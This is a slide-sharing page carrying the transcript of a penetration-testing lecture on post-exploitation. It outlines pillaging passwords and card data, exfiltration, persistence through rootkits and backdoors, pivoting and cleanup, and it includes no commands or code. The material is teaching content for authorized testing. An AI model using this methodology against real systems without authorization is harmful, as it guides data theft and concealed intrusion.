Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.

Slides:

Advertisements

Similar presentations

Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.

Advertisements

SIEM Based Intrusion Detection Jim Beechey May 2010 GSEC, GCIA, GCIH, GCFA, GCWN twitter: jim_beechey.

1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.

Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.

1 SANS Technology Institute - Candidate for Master of Science Degree 1 SIEM Based Intrusion Detection Jim Beechey March 2010 GSEC Gold, GCIA Gold, GCIH,

Module 5: Configuring Access for Remote Clients and Networks.

System Security Scanning and Discovery Chapter 14.

Web Server Administration TEC 236 Securing the Web Environment.

System and Network Security Practices COEN 351 E-Commerce Security.

Defense-in-Depth Against Malicious Software Jeff Alexander IT Pro Evangelist Microsoft Australia

A Security Pattern for a Virtual Private Network Ajoy Kumar and Eduardo B. Fernandez Dept. of Computer Science and Eng. Florida Atlantic University Boca.

Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.

Computer Security and Penetration Testing

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Firewall 2 * Essential Network Security Book Slides. IT352 | Network Security |Najwa AlGhamdi 1.

Installing and Maintaining ISA Server. Planning an ISA Server Deployment Understand the current network infrastructure Review company security policies.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.

The Business of Penetration Testing

Presented by INTRUSION DETECTION SYSYTEM. CONTENT Basically this presentation contains, What is TripWire? How does TripWire work? Where is TripWire used?

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Course 6421A Module 7: Installing, Configuring, and Troubleshooting the Network Policy Server Role Service Presentation: 60 minutes Lab: 60 minutes Module.

1 Chapter 6 Network Security Threats. 2 Objectives In this chapter, you will: Learn how to defend against packet sniffers Understand the TCP, UDP, and.

Directory and File Transfer Services Chapter 7. Learning Objectives Explain benefits offered by centralized enterprise directory services such as LDAP.

LINUX Security, Firewalls & Proxies. Course Title Introduction to LINUX Security Models Objectives To understand the concept of system security To understand.

CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.

Copyright © 2002 ProsoftTraining. All rights reserved. Operating System Security.

Network Protocols. Why Protocols?  Rules and procedures to govern communication Some for transferring data Some for transferring data Some for route.

Vijay Krishnan Avinesh Dupat. A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators.

Common Cyber Defenses Tom Chothia Computer Security, Lecture 18.

Troubleshooting Windows Vista Security Chapter 4.

Software Security Testing Vinay Srinivasan cell:

Penetration Testing Training Day Penetration Testing Tools and Techniques – pt 1 Mike Westmacott, IRM plc Supported by.

MCTS Guide to Microsoft Windows Server 2008 Applications Infrastructure Configuration (Exam # ) Chapter Four Windows Server 2008 Remote Desktop Services,

Hour 7 The Application Layer 1. What Is the Application Layer? The Application layer is the top layer in TCP/IP's protocol suite Some of the components.

Linux Networking Security Sunil Manhapra & Ling Wang Project Report for CS691X July 15, 1998.

Linux Networking and Security

1 Welcome to CSC 301 Web Programming Charles Frank.

Planning a Microsoft Windows 2000 Administrative Structure Designing default administrative group membership Designing custom administrative groups local.

Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

CSE 4481 Computer Security Lab Mark Shtern. INTRODUCTION.

Copyright © cs-tutorial.com. Overview Introduction Architecture Implementation Evaluation.

CHAPTER 9 Sniffing.

G CITRIXHACKIN. Citrix Presentation Server 4.5 New version is called XenApp/Server Common Deployments Nfuse classic CSG – Citrix Secure Gateway Citrix.

Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.

Lesson 19-E-Commerce Security Needs. Overview Understand e-commerce services. Understand the importance of availability. Implement client-side security.

INTRUSION DETECTION SYSYTEM. CONTENT Basically this presentation contains, What is TripWire? How does TripWire work? Where is TripWire used? Tripwire.

1 Week #5 Routing and NAT Network Overview Configuring Routing Configuring Network Address Translation Troubleshooting Routing and Remote Access.

Retina Network Security Scanner

Module 14: Advanced Topics and Troubleshooting. Microsoft ® Windows ® Small Business Server (SBS) 2008 Management Console (Advanced Mode) Managing Windows.

JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.

Computer Security Sample security policy Dr Alexei Vernitski.

Penetration Testing By Blaze Sterling. Roadmap What is Penetration Testing How is it done? Penetration Testing Tools Kali Linux In depth included tools.

Unit 2 Personal Cyber Security and Social Engineering Part 2.

Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.

SAMET KARTAL No one wants to share own information with unknown person. Sometimes while sharing something with someone people wants to keep.

1 E-Site - FTP Services Setup / install guide. 2 About FTP services can run on any desired port(s) Runs as a windows service Works for all sites installed.

Internet Vulnerabilities & Criminal Activity Internet Forensics 12.1 April 26, 2010 Internet Forensics 12.1 April 26, 2010.

Proactive Incident Response

Penetration Testing: Concepts,Attacks and Defence Stratagies

Working at a Small-to-Medium Business or ISP – Chapter 8

Critical Security Controls

Secure Software Confidentiality Integrity Data Security Authentication

CSC300 Offensive Security Dr. Ronny L. Bull, Ph.D. Post Exploitation

Chapter 3. Basic Dynamic Analysis

11/17/2018 9:32 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN.

Operating System Security

Designing IIS Security (IIS – Internet Information Service)

Test 3 review FTP & Cybersecurity

Presentation transcript:

Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail

All materials is licensed under a Creative Commons “Share Alike” license. 2

# whoami Ali Al-Shemery Ph.D., MS.c., and BS.c., Jordan More than 14 years of Technical Background (mainly Linux/Unix and Infosec) Technical Instructor for more than 10 years (Infosec, and Linux Courses) Hold more than 15 well known Technical Certificates Infosec & Linux are my main Interests 3

Post-Exploitation “Shell is Only the Beginning” Darkoperator

Outline Why Post-Exploitation Post-Exploitation RoE Infrastructure Analysis Pillaging Sensitive Data User Information System Configurations High Value/Profile Target Data Exfiltration Persistence Cleanup 5

Why? Determine the value of the machine compromised, Maintain control of the machine for later use, Value depends on sensitivity of data and usefulness in further compromising the network, Helps identify and document: – sensitive data, – identify configuration settings, – communication channels, – and relationships with other network devices. Go beyond Exploit verification Shows how vulnerabilities can be chained to gain higher level of access (real-life attacks!!!) 6

Post-Exploitation RoE Protect the client Protect yourself 7

Infrastructure Analysis

Network Config. Interfaces Routing DNS Servers Proxy Servers (Net/App Level) ARP Table 9

Network Services Listening Services (TCP, UDP, etc), VPN Connections, Directory Services, Neighbors 10

Pillaging Obtaining information from targeted hosts – files containing personal information, – credit card information, – passwords, etc. Satisfy the goals or as part of the pivoting process. Location of this data will vary depending on the type of data. Knowledge of commonly used applications, server software and middleware is very important. Special tools may be necessary to obtain, extract or read the targeted data from some systems. 11

Check? Installed Software, Installed Services: – Security Services – File/Printer Shares – Database Servers – Directory Servers – Name Servers – Deployment Services – Certificate Authority – Source Code Management Server – Dynamic Host Configuration Server – Virtualization – Messaging – Monitoring and Management – Backup Systems – Others please add… 12

Sensitive Data Key-logging, Screen Capture, Network Traffic Capture, Previous Audit Reports (lucky day)! 13

User Information On System, Web Browsers, IM Clients 14

System Configuration Password Policy, Security Policies, Configured WiFi Networks and Keys. 15

High Value/Profile Targets Can be identified and further expanded from the targets identified in the pre-engagement meetings thru the analysis of: – Data gathered, – Interactions of those systems, – Services they run. This view of the operation and interactions of these high value/profile targets helps in the identification and measurement of impact that can be gained to the business do to the data and processes and to the overall integrity of the client’s infrastructure and services. 16

Data Exfiltration Mapping of all possible exfil paths, Testing exfiltration paths, Measuring control strengths 17

Persistence Autostart Malware Reverse Connections Rootkits – User Mode – Kernel Based C&C medium (http, dns, tcp, icmp) Backdoors VPN with credentials 18

Diving Further (Infra.) From Compromised System: – Upload tools, local system tools, ARP Scan, Sweeping, DNS Enum, Directory Services Enum, Brute force, Execute Further Exploits Thru Compromised System: – Port Forwarding, Proxy, VPN, Execute Further Exploits 19

Cleanup Process of cleaning the system after completing the penetration test. – User account: connect-back users – Binaries installed: executables, scripts, backdoors, rootkits, etc – Temp Files Restore original configuration setting if modified. Leave no trace Proper archiving and encryption of evidence to be handed back to customer Note: Ensure documented steps of exploitation 20

Special Thanks to the Penetration Testing Execution Standard (PTES) Team …

Summary Explained what is PE, and why its needed, The need to check the Post-Exploitation RoE, What do we mean by Infrastructure Analysis, What is Pillaging, What is Sensitive Data, and how to identify it, What User Information we need to gather, What are System Configurations, and where to check for them, Explained what is High Value/Profile Target, and what business impact they could lead if compromised, What do we mean by Data Exfiltration, What is Persistence, and methods to perform it, What is the Cleanup phase, and why is it necessary. 22

References Penetration Testing Execution Standard, standard.org/index.php/Main_Page, standard.org/index.php/Main_Page Linux/Unix/BSD Post-Exploitation Command List, NMH034VDM-1N-EWPRz2770K4/edit?pli=1, NMH034VDM-1N-EWPRz2770K4/edit?pli=1 Windows Post-Exploitation Command List, K1WHTJm4fgG3joiuz43rw/edit?pli=1, K1WHTJm4fgG3joiuz43rw/edit?pli=1 OSX Post-Exploitation, SO1K-24VVYnulUD2x3rJD3k/edit?pli=1, SO1K-24VVYnulUD2x3rJD3k/edit?pli=1 Metasploit Post Exploitation Command List, F2m3nIPEA_kekqqqA2Ywto/edit?pli=1, F2m3nIPEA_kekqqqA2Ywto/edit?pli=1 Post-Exploitation Command List, command-lists-request-to-edit.html, command-lists-request-to-edit.html 23